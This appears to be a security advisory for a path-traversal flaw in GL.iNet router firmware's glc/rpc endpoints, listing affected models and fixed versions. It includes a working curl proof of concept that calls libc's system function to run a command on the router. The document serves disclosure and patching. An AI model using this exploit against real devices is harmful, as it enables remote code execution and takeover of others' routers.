This vulnerability allows direct access via HTTP to /cgi-bin/glc to execute arbitrary methods within the C library, and the "glc" binary fails to properly sanitize the JSON data it receives, allowing the sending of path traversal sequences such as "../" within the "object" parameter. This can lead to potential arbitrary code execution.
● MT6000 /A1300 /X300B /AX1800 /AXT1800 /MT2500 /MT3000 /X3000 /XE3000 /XE300 /E750 /X750 /SFT1200 /AR300M /AR300M16 /AR750 /AR750S /B1300 /MT1300 /MT300N-V2 /AP1300 /B2200 /MV1000 /MV1000W /USB150 /SF1200 /N300 /S1300
● MT6000: 4.5.8, fixed in 4.6.2
● A1300/X300B: 4.5.16, fixed in 4.5.17
● AX1800/AXT1800/MT2500/MT3000: 4.5.16, fixed in 4.6.2
● X3000/XE3000: 4.4.8, fixed in 4.4.9
● XE300: 4.3.16, fixed in 4.3.17
● E750: 4.3.12, fixed in 4.3.17
● X750/SFT1200/AR300M/AR300M16/AR750/AR750S/B1300/MT1300/MT300N-V2: 4.3.11, fixed in 4.3.17
● AP1300: 3.217, fixed in 3.218
● B2200/MV1000/MV1000W/USB150/SF1200/N300/S1300: 3.216, fixed in 3.218
curl -v http://192.168.8.1/cgi-bin/glc --data-raw '{"object":"cable","method":"get_config"}'
curl -H 'glinet: 1' 127.0.0.1/rpc -d '{"method":"call", "params":["", "../../../../lib/libc", "system",{"command":"id"}]}' --If the path exists, it returns error code 0; if not, it returns "No such file or directory".
An attacker can execute malicious code to manipulate the router by leveraging the execution of code within the C library combined with directory traversal.